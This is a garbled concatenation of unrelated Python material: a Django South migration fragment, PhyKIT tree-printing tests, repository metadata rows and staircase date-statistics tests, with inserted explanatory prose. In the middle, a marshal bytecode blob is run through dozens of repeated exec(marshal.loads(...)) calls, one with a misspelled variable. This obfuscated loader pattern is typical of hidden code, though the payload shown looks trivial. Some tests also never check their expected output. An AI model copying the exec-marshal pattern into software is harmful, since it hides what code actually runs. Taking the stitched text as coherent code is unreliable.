'resume': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.Resume']"}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.edu': {
'Meta': {'object_name': 'Edu'},
'degree': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
'finish': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'gpa': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'university': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.exp': {
'Meta': {'object_name': 'Exp'},
'company': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
'finish': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'start': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.honor': {
'Meta': {'object_name': 'Honor'},
'date': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'descriptions': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.info': {
'Meta': {'object_name': 'Info'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.job': {
'Meta': {'object_name': 'Job'},
'description': ('django.db.models.fields.TextField', [], {'default': "''"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '120'})
},
u'resume_app.resume': {
'Meta': {'object_name': 'Resume'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'resume': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'upvotes': ('django.db.models.fields.IntegerField', [], {}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.skill': {
'Meta': {'object_name': 'Skill'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'skill_set': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.Skill_Set']"})
},
u'resume_app.skill_set': {
'Meta': {'object_name': 'Skill_Set'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['resume_app.Tag']", 'symmetrical': 'False'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'user_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['resume_app.User']"})
},
u'resume_app.user': {
'Meta': {'object_name': 'User'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '120'})
}
}
complete_apps = ['resume_app']
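The frozen-ORM dict above encodes every field as a triple of (dotted field class path, positional args, kwargs), with all values stored as their string representations. A small illustrative helper (not part of the migration itself) can render such a triple as a readable field signature:

```python
def describe_field(triple):
    """Render a South frozen-ORM field triple as a readable signature.

    `triple` is (dotted field class path, positional args, kwargs),
    exactly the shape used in the `models` dict above.
    """
    path, args, kwargs = triple
    name = path.rsplit('.', 1)[-1]  # e.g. 'CharField'
    parts = list(args) + ['%s=%s' % kv for kv in sorted(kwargs.items())]
    return '%s(%s)' % (name, ', '.join(parts))

print(describe_field(('django.db.models.fields.CharField', [], {'max_length': '120'})))
# CharField(max_length=120)
```

This only formats the frozen metadata; South itself evaluates these triples to rebuild real Django field instances when replaying the migration.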
import pytest
import sys
from math import isclose
from mock import patch, call
from pathlib import Path
from textwrap import dedent
from phykit.phykit import Phykit
here = Path(__file__)
@pytest.mark.integration
class TestPrintTree(object):
@patch("builtins.print")
def test_print_tree0(self, mocked_print):
expected_result = """
_________ raccoon
|
|___ bear
|
| _____ sea_lion
| ___|
| | |_____ seal
_|_|
| | _____________________________________________________ monkey
| | __________|
| || |________________________ cat
| |
| |_________ weasel
|
|____________ dog
"""
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/tree_simple.tre",
]
with patch.object(sys, "argv", testargs):
Phykit()
@patch("builtins.print")
def test_print_tree1(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with patch.object(sys, "argv", testargs):
Phykit()
@patch("builtins.print")
def test_print_tree_wrong_input(self, mocked_print):
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tr",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_alias0(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_alias1(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"pt",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_remove_branch_lengths_short(self, mocked_print):
expected_result = """
____ Aspergillus_fischeri_IBT_3003
|
| ____ Aspergillus_fischeri_IBT_3007
| |
|____| ____ Aspergillus_fischeri_NRRL181.GCF_0001...
| | |
| |____| ____ Aspergillus_fischeri_NRRL4585
| | |
| | | ____ Aspergillus_fumigatus_Af293
_| |____| ____|
| | | |____ Aspergillus_fumigatus_CEA10
| | ____|
| | | | ____ Aspergillus_fumigatus_HMR_AF_270
| |____| |____|
| | |____ Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
|____ Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
"-r"
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_remove_branch_lengths_long(self, mocked_print):
expected_result = """
____ Aspergillus_fischeri_IBT_3003
|
| ____ Aspergillus_fischeri_IBT_3007
| |
|____| ____ Aspergillus_fischeri_NRRL181.GCF_0001...
| | |
| |____| ____ Aspergillus_fischeri_NRRL4585
| | |
| | | ____ Aspergillus_fumigatus_Af293
_| |____| ____|
| | | |____ Aspergillus_fumigatus_CEA10
| | ____|
| | | | ____ Aspergillus_fumigatus_HMR_AF_270
| |____| |____|
| | |____ Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
|____ Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
"--remove"
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
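The tests above patch `builtins.print` and build an `expected_result` string, but never compare the two, so they only verify that `Phykit()` runs (or exits) without asserting on the printed tree. The mock does record every call, so the comparison could be added. A minimal, self-contained sketch (`show()` is a hypothetical stand-in for the PhyKIT code under test):

```python
from unittest.mock import patch, call

def show(tree_ascii):
    # Stand-in for the code under test, which prints an ASCII tree.
    print(tree_ascii)

with patch("builtins.print") as mocked_print:
    show("(A,(B,C));")
    # The mock records each call, so the test can assert on the actual
    # output instead of only checking that no exception was raised.
    mocked_print.assert_called_once_with("(A,(B,C));")
    assert mocked_print.call_args == call("(A,(B,C));")
```

Wiring `expected_result` into such an assertion would turn these smoke tests into real output checks.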
\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00'));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azm));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));ex
ec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim))
1c7c9e1768a82ac7f279ac63a4733520fb05e4a5 | 104 | py | Python | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 51 | 2015-05-22T05:41:31.000Z | 2022-03-11T07:04:47.000Z | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 108 | 2015-02-11T07:10:06.000Z | 2021-12-29T15:06:37.000Z | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 44 | 2015-05-26T19:12:17.000Z | 2021-05-22T14:56:14.000Z | from montepython.likelihood_class import Likelihood_clik
class Planck_lowl(Likelihood_clik):
pass
| 17.333333 | 56 | 0.836538 | 13 | 104 | 6.384615 | 0.692308 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 104 | 5 | 57 | 20.8 | 0.912088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
98cdc3661c4fea8396ea3f878dfbae6e4ba648fa | 56 | py | Python | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 65 | 2015-01-20T20:46:26.000Z | 2021-06-27T14:40:35.000Z | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 29 | 2015-02-01T22:35:17.000Z | 2017-08-07T08:18:23.000Z | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 35 | 2015-02-01T17:26:50.000Z | 2019-09-13T07:06:16.000Z | from ._hcache import Cached
from ._hcache import cached
| 18.666667 | 27 | 0.821429 | 8 | 56 | 5.5 | 0.5 | 0.454545 | 0.727273 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 56 | 2 | 28 | 28 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c7079ff2e47dbf62752b8c52352a2ac767ed3b1c | 31,624 | py | Python | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 11 | 2021-08-14T06:30:48.000Z | 2022-01-04T09:09:43.000Z | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 55 | 2021-08-22T01:53:21.000Z | 2021-12-21T03:28:11.000Z | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 10 | 2021-08-25T02:01:09.000Z | 2021-11-23T10:31:12.000Z | from datetime import datetime
import numpy as np
import pandas as pd
import pytest
import pytz
from staircase import Stairs
def pytest_generate_tests(metafunc):
if "date_func" in metafunc.fixturenames:
metafunc.parametrize(
"date_func",
[
"pandas",
"pydatetime",
"numpy",
"pandas_tz",
"pydatetime_tz",
"pandas_timedelta",
"pytimedelta",
"numpy_timedelta",
],
indirect=True,
)
@pytest.fixture
def date_func(request):
# returns a func which takes a pandas timestamp
if request.param == "pandas":
return lambda x: x
elif request.param == "pydatetime":
return pd.Timestamp.to_pydatetime
elif request.param == "numpy":
return pd.Timestamp.to_datetime64
elif request.param == "pandas_tz":
return lambda ts: pd.Timestamp.tz_localize(
ts, pytz.timezone("Australia/Sydney")
)
elif request.param == "pydatetime_tz":
return lambda ts: (
pd.Timestamp.tz_localize(
ts, pytz.timezone("Australia/Sydney")
).to_pydatetime()
)
elif request.param == "pandas_timedelta":
return lambda ts: ts - pd.Timestamp(2019, 12, 31)
elif request.param == "pytimedelta":
return lambda ts: (ts - pd.Timestamp(2019, 12, 31)).to_pytimedelta()
elif request.param == "numpy_timedelta":
return lambda ts: (ts - pd.Timestamp(2019, 12, 31)).to_timedelta64()
else:
assert False, "should not happen"
def timestamp(*args, date_func, **kwargs):
ts = pd.Timestamp(*args, **kwargs)
return date_func(ts)
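The `timestamp` helper above builds a pandas `Timestamp` and dispatches it through whichever converter the `date_func` fixture supplies. A standalone sketch of that dispatch pattern (using a hypothetical `timestamp_demo` that mirrors the helper rather than importing it), exercising two of the converters from the fixture:

```python
import pandas as pd

def timestamp_demo(*args, date_func, **kwargs):
    # mirrors the timestamp() helper: build a pandas Timestamp, then convert
    ts = pd.Timestamp(*args, **kwargs)
    return date_func(ts)

# the "pandas" converter is the identity; "pydatetime" yields datetime.datetime
as_pandas = timestamp_demo(2020, 1, 1, date_func=lambda x: x)
as_pydatetime = timestamp_demo(2020, 1, 1, date_func=pd.Timestamp.to_pydatetime)
```

Both results compare equal to `pd.Timestamp(2020, 1, 1)`, but only the first is still a `Timestamp`; the tests rely on this kind of type difference being handled uniformly.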
def assert_expected_type(stairs, date_func):
if stairs._data is None:
return
example_type = timestamp(2020, 1, 1, date_func=date_func)
try: # TODO this is a hack
example_type = pd.Timedelta(example_type)
except: # noqa
example_type = pd.Timestamp(
example_type
) # pandas natively converts datetimes to timestamps
assert all(
[type(example_type) == type(x) for x in stairs._data.index]
), "Unexpected type in step points"
if isinstance(example_type, (pd.Timestamp, datetime)):
assert all(
[example_type.tzinfo == x.tzinfo for x in stairs._data.index]
), "Unexpected timezone in step points"
def s1(date_func):
int_seq1 = Stairs(initial_value=0)
int_seq1.layer(
timestamp(2020, 1, 1, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
2,
)
int_seq1.layer(
timestamp(2020, 1, 3, date_func=date_func),
timestamp(2020, 1, 5, date_func=date_func),
2.5,
)
int_seq1.layer(
timestamp(2020, 1, 6, date_func=date_func),
timestamp(2020, 1, 7, date_func=date_func),
-2.5,
)
int_seq1.layer(
timestamp(2020, 1, 7, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
-2.5,
)
return int_seq1
def s2(date_func):
int_seq2 = Stairs(initial_value=0)
int_seq2.layer(
timestamp(2020, 1, 1, date_func=date_func),
timestamp(2020, 1, 7, date_func=date_func),
-2.5,
)
int_seq2.layer(
timestamp(2020, 1, 8, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
5,
)
int_seq2.layer(
timestamp(2020, 1, 2, date_func=date_func),
timestamp(2020, 1, 5, date_func=date_func),
4.5,
)
int_seq2.layer(
timestamp(2020, 1, 2, 12, date_func=date_func),
timestamp(2020, 1, 4, date_func=date_func),
-2.5,
)
return int_seq2
def s3(date_func): # boolean
int_seq = Stairs(initial_value=0)
int_seq.layer(
timestamp(2020, 1, 10, date_func=date_func),
timestamp(2020, 1, 30, date_func=date_func),
1,
)
int_seq.layer(
timestamp(2020, 1, 12, date_func=date_func),
timestamp(2020, 1, 13, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 15, date_func=date_func),
timestamp(2020, 1, 18, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 20, 12, date_func=date_func),
timestamp(2020, 1, 21, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 23, date_func=date_func),
timestamp(2020, 1, 23, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 27, date_func=date_func),
timestamp(2020, 1, 29, 12, date_func=date_func),
-1,
)
return int_seq
def s4(date_func): # boolean
int_seq = Stairs(initial_value=0)
int_seq.layer(
timestamp(2020, 1, 9, date_func=date_func),
timestamp(2020, 1, 29, date_func=date_func),
1,
)
int_seq.layer(
timestamp(2020, 1, 10, 12, date_func=date_func),
timestamp(2020, 1, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 12, 12, date_func=date_func),
timestamp(2020, 1, 13, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 20, date_func=date_func),
timestamp(2020, 1, 23, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 26, date_func=date_func),
timestamp(2020, 1, 26, 12, date_func=date_func),
-1,
)
int_seq.layer(
timestamp(2020, 1, 27, date_func=date_func),
timestamp(2020, 1, 28, 12, date_func=date_func),
-1,
)
return int_seq
@pytest.fixture
def s1_fix():
    # s1..s4 require a date_func; default to the identity (plain pandas timestamps)
    return s1(lambda x: x)
@pytest.fixture
def s2_fix():
    return s2(lambda x: x)
@pytest.fixture
def s3_fix():
    return s3(lambda x: x)
@pytest.fixture
def s4_fix():
    return s4(lambda x: x)
def test_max_dates_1(date_func):
assert s1(date_func).max() == 4.5, "Expected maximum to be 4.5"
def test_max_dates_2(date_func):
assert (
s1(date_func).agg("max", (None, timestamp(2020, 1, 2, date_func=date_func)))
== 2
), "Expected maximum to be 2"
def test_max_dates_3(date_func):
assert (
s1(date_func).agg("max", (timestamp(2020, 1, 5, 12, date_func=date_func), None))
== 2
), "Expected maximum to be 2"
def test_max_dates_4(date_func):
assert (
s1(date_func).agg(
"max",
(
timestamp(2020, 1, 8, date_func=date_func),
timestamp(2020, 1, 9, date_func=date_func),
),
)
== -0.5
), "Expected maximum to be -0.5"
def test_min_dates_1(date_func):
assert s1(date_func).min() == -0.5, "Expected minimum to be -0.5"
def test_min_dates_2(date_func):
assert (
s1(date_func).agg("min", (None, timestamp(2020, 1, 4, date_func=date_func)))
== 0
), "Expected minimum to be 0"
def test_min_dates_3(date_func):
assert (
s1(date_func).agg(
"min", (timestamp(2020, 1, 10, 12, date_func=date_func), None)
)
== 0
), "Expected minimum to be 0"
def test_min_dates_4(date_func):
assert (
s1(date_func).agg(
"min",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 4, 12, date_func=date_func),
),
)
== 4.5
), "Expected minimum to be 4.5"
def test_mode_dates_1(date_func):
assert s1(date_func).mode() == -0.5, "Expected mode to be -0.5"
def test_mode_dates_2(date_func):
assert (
s1(date_func).agg("mode", (None, timestamp(2020, 1, 4, date_func=date_func)))
== 2
), "Expected mode to be 2"
def test_mode_dates_3(date_func):
assert (
s1(date_func).agg("mode", (timestamp(2019, 12, 27, date_func=date_func), None))
== 0
), "Expected mode to be 0"
def test_mode_dates_4(date_func):
assert (
s1(date_func).agg(
"mode",
(
timestamp(2020, 1, 4, 12, date_func=date_func),
timestamp(2020, 1, 6, 12, date_func=date_func),
),
)
== 2
), "Expected mode to be 2"
def test_median_dates_1(date_func):
assert s1(date_func).median() == 2, "Expected median to be 2"
def test_median_dates_2(date_func):
assert (
s1(date_func).agg("median", (None, timestamp(2020, 1, 17, date_func=date_func)))
== 0
), "Expected median to be 0"
def test_median_dates_3(date_func):
assert (
s1(date_func).agg("median", (timestamp(2020, 1, 3, date_func=date_func), None))
== -0.5
), "Expected median to be -0.5"
def test_median_dates_4(date_func):
assert (
s1(date_func).agg(
"median",
(
timestamp(2020, 1, 4, 12, date_func=date_func),
timestamp(2020, 1, 6, 12, date_func=date_func),
),
)
== 2
), "Expected median to be 2"
def test_mean_dates_1(date_func):
assert abs(s1(date_func).mean() - 13 / 9) <= 0.00001, "Expected mean to be 13/9"
def test_mean_dates_2(date_func):
assert (
s1(date_func).agg("mean", (None, timestamp(2020, 1, 6, date_func=date_func)))
== 3
), "Expected mean to be 3"
def test_mean_dates_3(date_func):
assert (
s1(date_func).agg("mean", (timestamp(2020, 1, 4, date_func=date_func), None))
== 0.75
), "Expected mean to be 0.75"
def test_mean_dates_4(date_func):
assert (
s1(date_func).agg(
"mean",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 8, date_func=date_func),
),
)
== 1.375
), "Expected mean to be 1.375"
def test_integral_dates_1(date_func):
assert (
s1(date_func).integral() / pd.Timedelta("1 D") == 13
), "Expected integral to be 13 days"
def test_integral_dates_2(date_func):
assert (
s1(date_func).agg(
"integral", (None, timestamp(2020, 1, 6, date_func=date_func))
)
/ pd.Timedelta("1 D")
== 15
), "Expected integral to be 15 days"
def test_integral_dates_3(date_func):
assert (
s1(date_func).agg(
"integral", (timestamp(2020, 1, 4, date_func=date_func), None)
)
/ pd.Timedelta("1 H")
== 108
), "Expected integral to be 108 hours"
def test_integral_dates_4(date_func):
assert (
s1(date_func).agg(
"integral",
(
timestamp(2020, 1, 4, date_func=date_func),
timestamp(2020, 1, 8, date_func=date_func),
),
)
/ pd.Timedelta("1 H")
== 132
), "Expected integral to be 132 hours"
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.8580225122881124
# low, high = timestamp(2019,12,30, date_func=date_func), timestamp(2020,1,8,16, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.501189060642099
# low, high = timestamp(2020,1,2, date_func=date_func), timestamp(2020,1,11,3, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
# np.var(st1(pts))
# = 3.971476824920255
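The commented blocks above derive the expected variances by sampling the step function densely over the window and applying `np.var` to the samples. A self-contained illustration of that recipe, using a hand-rolled two-level step function (not staircase's `Stairs`) whose analytic variance is known:

```python
import numpy as np

def step(x):
    # value 2 on [0, 5), value -1 on [5, 10]
    return np.where(x < 5, 2.0, -1.0)

# dense, evenly spaced sample over the domain, as in the comments above
pts = np.linspace(0, 10, 1_000_001)
sampled_var = np.var(step(pts))
# analytically: mean = 0.5, E[f^2] = 2.5, so var = 2.5 - 0.25 = 2.25
```

The sampled estimate converges to the analytic value as the grid gets finer, which is why the expected values above carry so many digits.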
@pytest.mark.parametrize(
"bounds, expected",
[
((), 3.8580225122881124),
(((2019, 12, 30), (2020, 1, 8, 16)), 3.501189060642099),
(((2020, 1, 2), (2020, 1, 11, 3)), 3.971476824920255),
],
)
def test_s1_var(date_func, bounds, expected):
bounds2 = [timestamp(*args, date_func=date_func) for args in bounds]
if len(bounds2) > 0:
bounds2 = [bounds2]
assert np.isclose(s1(date_func).agg("var", *bounds2), expected, atol=0.00001)
# low, high = timestamp(2020,1,1, date_func=date_func), timestamp(2020,1,10, date_func=date_func)
# total_secs = int((high-low).total_seconds())
# pts = [low + pd.Timedelta(x, unit='sec') for x in np.linspace(0, total_secs, total_secs)]
